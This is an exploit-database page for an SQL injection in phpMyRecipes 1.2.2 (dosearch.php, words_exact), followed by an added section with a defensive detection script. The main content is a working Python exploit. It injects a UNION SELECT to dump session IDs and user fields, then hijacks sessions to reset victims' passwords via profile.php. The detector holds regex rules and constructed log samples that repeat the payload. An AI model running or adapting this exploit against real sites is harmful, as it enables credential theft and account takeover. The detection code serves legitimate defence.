phpMyRecipes 1.2.2 (dosearch.php, words_exact param) - SQL Injection
Source: vfocus.net   Author: bard   Published: 2014-11-26
#!/usr/bin/python

import httplib
from bs4 import BeautifulSoup
import re
import os

###########
# Function that takes an SQL select statement and inject it into the words_exact variable of dosearch.php 
# Returns BeautifulSoup object 
###########
def sqli(select):
  inject = '"\' IN BOOLEAN MODE) UNION ' + select + '#'
  body = 'words_all=&words_exact=' + inject + '&words_any=&words_without=&name_exact=&ing_modifier=2'
  c = httplib.HTTPConnection('127.0.0.1:80')
  c.request("POST", '/phpMyRecipes/dosearch.php', body, headers)
  r = c.getresponse()
  html = r.read()
  return BeautifulSoup(html)

#############
# Variables #
#############
headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Endocing": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded"}
select = 'SELECT userid,sessionID from sessions;'   # Modify the select statement to see what else you can do
data = {}

###########
# Run Injection and see what comes back
###########
soup = sqli(select)

###########
# Parse returned information with BeautifulSoup- store in data dictionary
###########
# Session IDs are 32-character strings: pick out the anchors whose text is exactly 32 characters long
for ID in soup("a", text=re.compile(r"^.{32}$")):
  data[ID.string] = {}
  values = ['userid','username','cookieOK','privs','ts']
  for value in values:
   #select = "SELECT NULL,userid from sessions where sessionID='" + ID.string + "';"
   select = "SELECT NULL," + value + " from sessions where sessionID='" + ID.string + "';"
   soup = sqli(select)
   rval = soup("a")[-1].string
   data[ID.string][value] = rval

###########
# Loop through data- print session information and decide if you want to change a user's password
###########
for sessionid,values in data.iteritems():
 print "Session ID: " + sessionid
 for field,value in values.iteritems():
  print "\t" + field + ": " + value
 print("Do you want to change this user's password? (y/N)"),
 ans = 'N'
 ans = raw_input()
 goforth = re.compile("[Yy].*")
 if goforth.match(ans):
  print("Enter new password: "),
  os.system("stty -echo")
  password1 = raw_input()
  os.system("stty echo")
  print("\nAgain with the password: "),
  os.system("stty -echo")
  password2 = raw_input()
  os.system("stty echo")
  print ("")
  if password1 == password2:
   body = 'sid=' + sessionid + '&username=' + data[sessionid]['username'] + '&name=Hacked&email=hacked%40hacked.com&password1=' + password1 + '&password2=' + password1
   c = httplib.HTTPConnection('127.0.0.1:80')
   c.request("POST", '/phpMyRecipes/profile.php', body, headers)
   r = c.getresponse()
   html = r.read()
   print ("===================================")
   print BeautifulSoup(html)("p",{"class": "content"})[0].string
   print ("===================================\n\n")
  else:
   print "Passwords did not match"
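The payload above works by closing the quoted fulltext literal (`"' IN BOOLEAN MODE)`), appending a UNION SELECT and truncating the rest of the statement with `#`. A defender can look for exactly that structure in form bodies submitted to dosearch.php. The following is an added detection example written for this page; it is not part of the original exploit or of phpMyRecipes. It assumes request bodies have been captured by a reverse proxy or WAF audit log as (path, body) pairs; the sample records are constructed, not real traffic.

```python
import re
from urllib.parse import parse_qs

# Constructed sample records (path, urlencoded POST body), as a reverse proxy
# or WAF audit log might store them. None of these come from real traffic.
SAMPLE_REQUESTS = [
    ("/phpMyRecipes/dosearch.php",
     "words_all=&words_exact=chicken+soup&words_any=&words_without=&name_exact=&ing_modifier=2"),
    ("/phpMyRecipes/dosearch.php",
     "words_all=&words_exact=%22%27+IN+BOOLEAN+MODE%29+UNION+SELECT+userid%2CsessionID"
     "+from+sessions%3B%23&words_any=&words_without=&name_exact=&ing_modifier=2"),
    ("/phpMyRecipes/dosearch.php",
     "words_all=&words_exact=%22%27+IN+BOOLEAN+MODE%29+UNION+SELECT+NULL%2Cusername"
     "+from+sessions+where+sessionID%3D%27abc%27%3B%23&words_any=&ing_modifier=2"),
    ("/phpMyRecipes/profile.php",
     "sid=abc&username=bob&name=Hacked&email=hacked%40hacked.com&password1=x&password2=x"),
]

# Form fields that dosearch.php feeds into its search query.
SEARCH_FIELDS = ("words_all", "words_exact", "words_any", "words_without", "name_exact")

# Each rule targets one structural piece of the injection seen on this page:
# breaking out of the AGAINST('...' IN BOOLEAN MODE) literal, appending a
# UNION SELECT, and truncating the remainder of the statement with a comment.
RULES = [
    ("boolean-mode-breakout", re.compile(r"""['"]\s*IN\s+BOOLEAN\s+MODE\s*\)""", re.I)),
    ("union-select", re.compile(r"\bUNION\b.*\bSELECT\b", re.I | re.S)),
    ("sql-comment", re.compile(r"(#|--\s|/\*)")),
]

# A comment character alone is weak evidence; require one of these before alerting.
STRONG_RULES = {"boolean-mode-breakout", "union-select"}


def scan_body(path, body):
    """Return a list of (field, decoded_value, [rule names]) for suspicious search fields.

    Only dosearch.php is inspected; other paths return an empty list.
    """
    findings = []
    if not path.endswith("/dosearch.php"):
        return findings
    fields = parse_qs(body, keep_blank_values=True)  # decodes %22%27 -> "' etc.
    for name in SEARCH_FIELDS:
        for value in fields.get(name, []):
            hits = [rule for rule, rx in RULES if rx.search(value)]
            if STRONG_RULES.intersection(hits):
                findings.append((name, value, hits))
    return findings


def scan_requests(records):
    """Return [(path, findings)] for every record that produced at least one finding."""
    flagged = []
    for path, body in records:
        findings = scan_body(path, body)
        if findings:
            flagged.append((path, findings))
    return flagged


if __name__ == "__main__":
    for path, findings in scan_requests(SAMPLE_REQUESTS):
        for field, value, hits in findings:
            print("%s field=%s rules=%s value=%r" % (path, field, ",".join(hits), value))
```

The rules deliberately key on the breakout sequence rather than on the word "sessions" or a particular SELECT, so the same check also catches the per-field follow-up queries the script issues after the first hit.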
